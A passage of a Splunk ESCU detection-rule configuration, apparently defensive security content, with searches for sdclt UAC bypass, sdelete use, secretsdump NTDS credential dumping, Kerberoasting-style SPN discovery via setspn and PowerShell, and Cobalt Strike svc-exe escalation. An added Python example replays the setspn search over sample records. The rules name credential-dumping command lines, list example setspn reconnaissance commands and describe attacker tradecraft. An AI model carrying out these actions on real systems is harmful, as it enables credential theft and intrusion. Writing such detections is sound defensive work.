search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=scrcons.exe by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `script_execution_via_wmi_filter`

[ESCU - Sdclt UAC Bypass - Rule]
action.escu = 0
action.escu.enabled = 1
description = This search is to detect a suspicious sdclt.exe registry modification. This technique is commonly seen when attackers try to bypass UAC via the sdclt.exe application by modifying registry keys that sdclt.exe tries to open or query, placing a payload file path in them to be executed.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.002", "T1548"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This search is to detect a suspicious sdclt.exe registry modification. This technique is commonly seen when attackers try to bypass UAC via the sdclt.exe application by modifying registry keys that sdclt.exe tries to open or query, placing a payload file path in them to be executed.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = Limited to no false positives are expected.
action.escu.creation_date = 2022-11-14
action.escu.modification_date = 2022-11-14
action.escu.confidence = high
action.escu.full_search_name = ESCU - Sdclt UAC Bypass - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Windows Defense Evasion Tactics", "Windows Registry Abuse"]
action.risk = 1
action.risk.param._risk_message = Suspicious modification of registry $registry_path$ with possible payload path $registry_value_name$ in $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 63}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Sdclt UAC Bypass - Rule
action.correlationsearch.annotations = {"analytic_story": ["Windows Defense Evasion Tactics", "Windows Registry Abuse"], "cis20": ["CIS 10"], "confidence": 90, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.002", "T1548"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This search is to detect a suspicious sdclt.exe registry modification. This technique is commonly seen when attackers try to bypass UAC via the sdclt.exe application by modifying registry keys that sdclt.exe tries to open or query, placing a payload file path in them to be executed.
action.notable.param.rule_title = Sdclt UAC Bypass
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) AS firstTime max(_time) AS lastTime FROM datamodel=Endpoint.Processes BY _time span=1h Processes.user Processes.process_id Processes.process_name Processes.process Processes.process_path Processes.dest Processes.parent_process_name Processes.parent_process Processes.process_guid | `drop_dm_object_name(Processes)` | join process_guid [ | tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE ((Registry.registry_path= "*\\Windows\\CurrentVersion\\App Paths\\control.exe*" OR Registry.registry_path= "*\\exefile\\shell\\runas\\command\\*") (Registry.registry_value_name = "(Default)" OR Registry.registry_value_name = "IsolatedCommand")) BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)`] | fields firstTime lastTime dest user parent_process_name parent_process process_name process_path process registry_key_name registry_path registry_value_name registry_value_data process_guid | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `sdclt_uac_bypass_filter`

[ESCU - Sdelete Application Execution - Rule]
action.escu = 0
action.escu.enabled = 1
description = This analytic is to detect the execution of the sdelete.exe Sysinternals tool. This tool is one of the most used tools by malware and adversaries to remove or clear their tracks and artifacts on the targeted host. This tool is designed to securely delete a file from the file system, removing forensic evidence from the machine. This is a good TTP query to check why a user executed this application, which is not a common practice.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives", "Exploitation"], "mitre_attack": ["T1485", "T1070.004", "T1070"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This analytic is to detect the execution of the sdelete.exe Sysinternals tool. This tool is one of the most used tools by malware and adversaries to remove or clear their tracks and artifacts on the targeted host. This tool is designed to securely delete a file from the file system, removing forensic evidence from the machine. This is a good TTP query to check why a user executed this application, which is not a common practice.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = A user may legitimately execute and use this application.
action.escu.creation_date = 2021-10-06
action.escu.modification_date = 2021-10-06
action.escu.confidence = high
action.escu.full_search_name = ESCU - Sdelete Application Execution - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Masquerading - Rename System Utilities"]
action.risk = 1
action.risk.param._risk_message = sdelete process $process_name$ executed in $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 49}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 49}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Sdelete Application Execution - Rule
action.correlationsearch.annotations = {"analytic_story": ["Masquerading - Rename System Utilities"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Actions on Objectives", "Exploitation"], "mitre_attack": ["T1485", "T1070.004", "T1070"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This analytic is to detect the execution of the sdelete.exe Sysinternals tool. This tool is one of the most used tools by malware and adversaries to remove or clear their tracks and artifacts on the targeted host. This tool is designed to securely delete a file from the file system, removing forensic evidence from the machine. This is a good TTP query to check why a user executed this application, which is not a common practice.
action.notable.param.rule_title = Sdelete Application Execution
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` values(Processes.process) as process values(Processes.parent_process) as parent_process values(Processes.process_id) as process_id count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_sdelete` by Processes.process_name Processes.original_file_name Processes.dest Processes.user Processes.parent_process_name Processes.parent_process | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `sdelete_application_execution_filter`

[ESCU - SearchProtocolHost with no Command Line with Network - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic identifies searchprotocolhost.exe with no command line arguments and with a network connection. It is unusual for searchprotocolhost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. searchprotocolhost.exe is natively found in C:\Windows\system32 and C:\Windows\syswow64.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1055"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint", "Network_Traffic"]
action.escu.eli5 = The following analytic identifies searchprotocolhost.exe with no command line arguments and with a network connection. It is unusual for searchprotocolhost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. searchprotocolhost.exe is natively found in C:\Windows\system32 and C:\Windows\syswow64.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = Limited false positives may be present in small environments. Tuning may be required based on parent process.
action.escu.creation_date = 2023-07-10
action.escu.modification_date = 2023-07-10
action.escu.confidence = high
action.escu.full_search_name = ESCU - SearchProtocolHost with no Command Line with Network - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["BlackByte Ransomware", "Cobalt Strike", "Graceful Wipe Out Attack"]
action.risk = 1
action.risk.param._risk_message = A searchprotocolhost.exe process $process_name$ with no command line in host $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 70}, {"threat_object_field": "process_name", "threat_object_type": "process"}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - SearchProtocolHost with no Command Line with Network - Rule
action.correlationsearch.annotations = {"analytic_story": ["BlackByte Ransomware", "Cobalt Strike", "Graceful Wipe Out Attack"], "cis20": ["CIS 10"], "confidence": 100, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1055"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic identifies searchprotocolhost.exe with no command line arguments and with a network connection. It is unusual for searchprotocolhost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. searchprotocolhost.exe is natively found in C:\Windows\system32 and C:\Windows\syswow64.
action.notable.param.rule_title = SearchProtocolHost with no Command Line with Network
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Processes where Processes.process_name=searchprotocolhost.exe by _time span=1h Processes.process_id Processes.process_name Processes.dest Processes.process_path Processes.process Processes.parent_process_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | regex process="(?i)(searchprotocolhost\.exe.{0,4}$)" | join process_id [| tstats `security_content_summariesonly` count FROM datamodel=Network_Traffic.All_Traffic where All_Traffic.dest_port != 0 by All_Traffic.process_id All_Traffic.dest All_Traffic.dest_port | `drop_dm_object_name(All_Traffic)` | rename dest as C2 ] | table _time dest parent_process_name process_name process_path process process_id dest_port C2 | `searchprotocolhost_with_no_command_line_with_network_filter`

[ESCU - SecretDumps Offline NTDS Dumping Tool - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic detects a potential usage of the secretsdump.py tool for dumping credentials (NTLM hashes) from a copy of ntds.dit and the SAM, SECURITY, and SYSTEM registry hives. This technique was seen used by attackers who dump NTLM hashes offline after obtaining a copy of ntds.dit and the SAM/SYSTEM/SECURITY registry hives.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1003.003", "T1003"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = The following analytic detects a potential usage of the secretsdump.py tool for dumping credentials (NTLM hashes) from a copy of ntds.dit and the SAM, SECURITY, and SYSTEM registry hives. This technique was seen used by attackers who dump NTLM hashes offline after obtaining a copy of ntds.dit and the SAM/SYSTEM/SECURITY registry hives.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = unknown
action.escu.creation_date = 2023-06-13
action.escu.modification_date = 2023-06-13
action.escu.confidence = high
action.escu.full_search_name = ESCU - SecretDumps Offline NTDS Dumping Tool - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Credential Dumping", "Graceful Wipe Out Attack", "Rhysida Ransomware"]
action.risk = 1
action.risk.param._risk_message = A secretsdump process $process_name$ with secretsdump command line $process$ to dump credentials in host $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 80}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 80}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - SecretDumps Offline NTDS Dumping Tool - Rule
action.correlationsearch.annotations = {"analytic_story": ["Credential Dumping", "Graceful Wipe Out Attack", "Rhysida Ransomware"], "cis20": ["CIS 10"], "confidence": 100, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1003.003", "T1003"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic detects a potential usage of the secretsdump.py tool for dumping credentials (NTLM hashes) from a copy of ntds.dit and the SAM, SECURITY, and SYSTEM registry hives. This technique was seen used by attackers who dump NTLM hashes offline after obtaining a copy of ntds.dit and the SAM/SYSTEM/SECURITY registry hives.
action.notable.param.rule_title = SecretDumps Offline NTDS Dumping Tool
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name = "python*.exe" Processes.process = "*.py*" Processes.process = "*-ntds*" (Processes.process = "*-system*" OR Processes.process = "*-sam*" OR Processes.process = "*-security*" OR Processes.process = "*-bootkey*") by Processes.process_name Processes.process Processes.parent_process_name Processes.parent_process Processes.dest Processes.user Processes.process_id Processes.process_guid | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `secretdumps_offline_ntds_dumping_tool_filter`

[ESCU - ServicePrincipalNames Discovery with PowerShell - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic identifies `powershell.exe` usage, using Script Block Logging EventCode 4104, related to querying the domain for Service Principal Names. Typically, this is a precursor activity related to kerberoasting or the silver ticket attack. \
What is a ServicePrincipalName? \
A service principal name (SPN) is a unique identifier of a service instance. SPNs are used by Kerberos authentication to associate a service instance with a service logon account. This allows a client application to request that the service authenticate an account even if the client does not have the account name.\
The following analytic identifies the use of the KerberosRequestorSecurityToken class within the script block. Using the .NET System.IdentityModel.Tokens.KerberosRequestorSecurityToken class in PowerShell is the equivalent of using setspn.exe. \
During triage, review parallel processes for further suspicious activity.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1558.003"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = The following analytic identifies `powershell.exe` usage, using Script Block Logging EventCode 4104, related to querying the domain for Service Principal Names. Typically, this is a precursor activity related to kerberoasting or the silver ticket attack. \
What is a ServicePrincipalName? \
A service principal name (SPN) is a unique identifier of a service instance. SPNs are used by Kerberos authentication to associate a service instance with a service logon account. This allows a client application to request that the service authenticate an account even if the client does not have the account name.\
The following analytic identifies the use of the KerberosRequestorSecurityToken class within the script block. Using the .NET System.IdentityModel.Tokens.KerberosRequestorSecurityToken class in PowerShell is the equivalent of using setspn.exe. \
During triage, review parallel processes for further suspicious activity.
action.escu.how_to_implement = To successfully implement this analytic, you will need to enable PowerShell Script Block Logging on some or all endpoints. Additional setup here https://docs.splunk.com/Documentation/UBA/5.0.4.1/GetDataIn/AddPowerShell#Configure_module_logging_for_PowerShell.
action.escu.known_false_positives = False positives should be limited, however filter as needed.
action.escu.creation_date = 2022-02-26 action.escu.modification_date = 2022-02-26 action.escu.confidence = high action.escu.full_search_name = ESCU - ServicePrincipalNames Discovery with PowerShell - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Active Directory Discovery", "Active Directory Kerberos Attacks", "Malicious PowerShell", "Active Directory Privilege Escalation"] action.risk = 1 action.risk.param._risk_message = An instance of attempting to identify service principle detected on $dest$ names. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 80}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 80}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - ServicePrincipalNames Discovery with PowerShell - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery", "Active Directory Kerberos Attacks", "Malicious PowerShell", "Active Directory Privilege Escalation"], "cis20": ["CIS 10"], "confidence": 100, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1558.003"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies `powershell.exe` usage, using Script Block Logging EventCode 4104, related to querying the domain for Service Principle Names. typically, this is a precursor activity related to kerberoasting or the silver ticket attack. \ What is a ServicePrincipleName? \ A service principal name (SPN) is a unique identifier of a service instance. 
SPNs are used by Kerberos authentication to associate a service instance with a service logon account. This allows a client application to request that the service authenticate an account even if the client does not have the account name.\ The following analytic identifies the use of KerberosRequestorSecurityToken class within the script block. Using .NET System.IdentityModel.Tokens.KerberosRequestorSecurityToken class in PowerShell is the equivelant of using setspn.exe. \ During triage, review parallel processes for further suspicious activity. action.notable.param.rule_title = ServicePrincipalNames Discovery with PowerShell action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `powershell` EventCode=4104 ScriptBlockText="*KerberosRequestorSecurityToken*" | stats count min(_time) as firstTime max(_time) as lastTime by ScriptBlockText Opcode Computer UserID EventCode | rename Computer as dest | rename UserID as user | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `serviceprincipalnames_discovery_with_powershell_filter` [ESCU - ServicePrincipalNames Discovery with SetSPN - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies `setspn.exe` usage related to querying the domain for Service Principle Names. typically, this is a precursor activity related to kerberoasting or the silver ticket attack. \ What is a ServicePrincipleName? \ A service principal name (SPN) is a unique identifier of a service instance. SPNs are used by Kerberos authentication to associate a service instance with a service logon account. This allows a client application to request that the service authenticate an account even if the client does not have the account name.\ Example usage includes the following \ 1. 
setspn -T offense -Q */* 1. setspn -T attackrange.local -F -Q MSSQLSvc/* 1. setspn -Q */* > allspns.txt 1. setspn -q \ Values \ 1. -F = perform queries at the forest, rather than domain level 1. -T = perform the query on the specified domain or forest (when -F is also used) 1. -Q = query for existence of SPN \ During triage, review parallel processes for further suspicious activity. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1558.003"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies `setspn.exe` usage related to querying the domain for Service Principal Names. Typically, this is a precursor activity related to Kerberoasting or the silver ticket attack. \ What is a ServicePrincipalName? \ A service principal name (SPN) is a unique identifier of a service instance. SPNs are used by Kerberos authentication to associate a service instance with a service logon account. This allows a client application to request that the service authenticate an account even if the client does not have the account name.\ Example usage includes the following \ 1. setspn -T offense -Q */* 1. setspn -T attackrange.local -F -Q MSSQLSvc/* 1. setspn -Q */* > allspns.txt 1. setspn -q \ Values \ 1. -F = perform queries at the forest, rather than domain level 1. -T = perform the query on the specified domain or forest (when -F is also used) 1. -Q = query for existence of SPN \ During triage, review parallel processes for further suspicious activity. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. 
These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = False positives may be caused by Administrators resetting SPNs or querying for SPNs. Filter as needed. action.escu.creation_date = 2021-10-14 action.escu.modification_date = 2021-10-14 action.escu.confidence = high action.escu.full_search_name = ESCU - ServicePrincipalNames Discovery with SetSPN - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Active Directory Discovery", "Active Directory Kerberos Attacks", "Active Directory Privilege Escalation"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$ attempting to identify service principal names. 
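Added example (not part of the ESCU content or the Splunk Threat Research Team's code): the command-line conditions of the SetSPN search in this stanza, replayed in Python over a few constructed Endpoint.Processes records. The body of the `process_setspn` macro is not on this page, so the example assumes it matches on process_name = setspn.exe. Three points a practitioner porting the search should know: in SPL, OR clauses are evaluated before AND, so the macro scopes every OR clause and a non-setspn command line containing `-s` does not match; the `*-q*` clause alone already matches everything the `*-q* AND **/**` clause does, so that clause is redundant; and `*-s*` also matches `setspn -S`, which adds an SPN, which is why administrators resetting SPNs are listed as a false-positive source. `setspn -L <account>`, which lists an account's SPNs, is matched by none of the clauses.

```python
# Added example: replays the "ServicePrincipalNames Discovery with SetSPN"
# conditions over constructed Endpoint.Processes records. Not ESCU code.
from fnmatch import fnmatch

# Constructed sample records (not real telemetry); field names follow the
# Endpoint.Processes data model the search reads.
SAMPLE_EVENTS = [
    {"dest": "ws01", "user": "CORP\\jdoe", "parent_process_name": "cmd.exe",
     "process_name": "setspn.exe",
     "process": "setspn -T corp.local -F -Q MSSQLSvc/*"},
    {"dest": "ws01", "user": "CORP\\jdoe", "parent_process_name": "powershell.exe",
     "process_name": "setspn.exe",
     "process": "setspn -Q */* > allspns.txt"},
    {"dest": "dc01", "user": "CORP\\admin1", "parent_process_name": "cmd.exe",
     "process_name": "setspn.exe",
     "process": "setspn -S MSSQLSvc/sql01.corp.local:1433 CORP\\svc_sql"},
    {"dest": "ws02", "user": "CORP\\asmith", "parent_process_name": "cmd.exe",
     "process_name": "setspn.exe",
     "process": "setspn -L CORP\\svc_sql"},          # -L is not in any clause
    {"dest": "ws02", "user": "CORP\\asmith", "parent_process_name": "cmd.exe",
     "process_name": "findstr.exe",
     "process": "findstr -s -i password *.txt"},    # has "-s" but is not setspn
]


def _like(value, pattern):
    """Case-insensitive wildcard match, like an SPL field="*pat*" clause."""
    return fnmatch(value.lower(), pattern.lower())


def is_setspn(event):
    # Assumption: the `process_setspn` macro matches on the binary name.
    return _like(event.get("process_name", ""), "setspn.exe")


def matches_spn_discovery(event):
    """Search conditions: macro AND ((-t AND -f) OR (-q AND */*) OR -q OR -s)."""
    if not is_setspn(event):
        return False
    p = event.get("process", "")
    return ((_like(p, "*-t*") and _like(p, "*-f*"))
            or (_like(p, "*-q*") and _like(p, "*/*"))   # subsumed by the next clause
            or _like(p, "*-q*")
            or _like(p, "*-s*"))


def spn_discovery_hits(events):
    """Return (dest, user, parent_process_name, process) for matching records."""
    return [(e["dest"], e["user"], e["parent_process_name"], e["process"])
            for e in events if matches_spn_discovery(e)]


if __name__ == "__main__":
    for hit in spn_discovery_hits(SAMPLE_EVENTS):
        print(hit)
```

The first three records match (query at forest scope, wildcard query, SPN set); the `-L` listing and the findstr command do not.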
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 80}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 80}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 80}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 80}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - ServicePrincipalNames Discovery with SetSPN - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery", "Active Directory Kerberos Attacks", "Active Directory Privilege Escalation"], "cis20": ["CIS 10"], "confidence": 100, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1558.003"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies `setspn.exe` usage related to querying the domain for Service Principal Names. Typically, this is a precursor activity related to Kerberoasting or the silver ticket attack. \ What is a ServicePrincipalName? \ A service principal name (SPN) is a unique identifier of a service instance. SPNs are used by Kerberos authentication to associate a service instance with a service logon account. This allows a client application to request that the service authenticate an account even if the client does not have the account name.\ Example usage includes the following \ 1. setspn -T offense -Q */* 1. setspn -T attackrange.local -F -Q MSSQLSvc/* 1. setspn -Q */* > allspns.txt 1. setspn -q \ Values \ 1. -F = perform queries at the forest, rather than domain level 1. -T = perform the query on the specified domain or forest (when -F is also used) 1. 
-Q = query for existence of SPN \ During triage, review parallel processes for further suspicious activity. action.notable.param.rule_title = ServicePrincipalNames Discovery with SetSPN action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_setspn` (Processes.process="*-t*" AND Processes.process="*-f*") OR (Processes.process="*-q*" AND Processes.process="**/**") OR (Processes.process="*-q*") OR (Processes.process="*-s*") by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.original_file_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)`| `serviceprincipalnames_discovery_with_setspn_filter` [ESCU - Services Escalate Exe - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies the use of `svc-exe` with Cobalt Strike. The behavior typically follows after an adversary has already gained initial access and is escalating privileges. Using `svc-exe`, a randomly named binary will be downloaded from the remote Teamserver and placed on disk at `C:\Windows\400619a.exe`. Next, the binary will be added to the registry under key `HKLM\System\CurrentControlSet\Services\400619a\` with multiple keys and values added to look like a legitimate service. Upon loading, `services.exe` will spawn the randomly named binary from `\\127.0.0.1\ADMIN$\400619a.exe`. The process lineage is completed with `400619a.exe` spawning rundll32.exe, which is the default `spawnto_` value for Cobalt Strike. 
The `spawnto_` value is arbitrary and may be any process on disk (typically a system32/syswow64 binary). The `spawnto_` process will also make a network connection. During triage, review parallel processes and identify any additional file modifications. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies the use of `svc-exe` with Cobalt Strike. The behavior typically follows after an adversary has already gained initial access and is escalating privileges. Using `svc-exe`, a randomly named binary will be downloaded from the remote Teamserver and placed on disk at `C:\Windows\400619a.exe`. Next, the binary will be added to the registry under key `HKLM\System\CurrentControlSet\Services\400619a\` with multiple keys and values added to look like a legitimate service. Upon loading, `services.exe` will spawn the randomly named binary from `\\127.0.0.1\ADMIN$\400619a.exe`. The process lineage is completed with `400619a.exe` spawning rundll32.exe, which is the default `spawnto_` value for Cobalt Strike. The `spawnto_` value is arbitrary and may be any process on disk (typically a system32/syswow64 binary). The `spawnto_` process will also make a 